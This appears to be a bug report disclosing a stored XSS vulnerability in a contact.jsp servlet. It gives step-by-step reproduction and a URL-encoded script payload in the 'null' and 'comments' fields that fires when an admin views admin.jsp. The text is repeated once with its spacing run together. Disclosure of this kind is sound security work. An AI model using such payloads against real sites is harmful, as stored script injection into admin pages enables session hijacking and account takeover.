It is possible to run a XSS attack through the contact.jsp servlet that allows attackers to run arbitrary javascript code on the contact.jsp page itself and on admin.jsp.
Go to contact.jsp as guest user
Switch on network traffic recording (through your browser or proxy)
Click the submit button
Change both the null and comments fields to %3CScript%3Ealert%28%27hello%27%29%3B%3C%2FScript%3E (e.g. null=%3CScript%3Ealert%28%27hello%27%29%3B%3C%2FScript%3E&anticsrf=0.33839068496777436&comments=%3CScript%3Ealert%28%27hello%27%29%3B%3C%2FScript%3Enull=%3CScript%3Ealert%28%27hello%27%29%3B%3C%2FScript%3E&anticsrf=0.33839068496777436&comments=%3CScript%3Ealert%28%27hello%27%29%3B%3C%2FScript%3E).
Login as admin user
Two pop-up boxes with the text hello should be displayed
It is possible to run a XSS attack through the
contact.jspservlet that allows attackers to run arbitrary javascript code on thecontact.jsppage itself and onadmin.jsp.contact.jspas guest usernullandcommentsfields to%3CScript%3Ealert%28%27hello%27%29%3B%3C%2FScript%3E(e.g.null=%3CScript%3Ealert%28%27hello%27%29%3B%3C%2FScript%3E&anticsrf=0.33839068496777436&comments=%3CScript%3Ealert%28%27hello%27%29%3B%3C%2FScript%3Enull=%3CScript%3Ealert%28%27hello%27%29%3B%3C%2FScript%3E&anticsrf=0.33839068496777436&comments=%3CScript%3Ealert%28%27hello%27%29%3B%3C%2FScript%3E).helloshould be displayed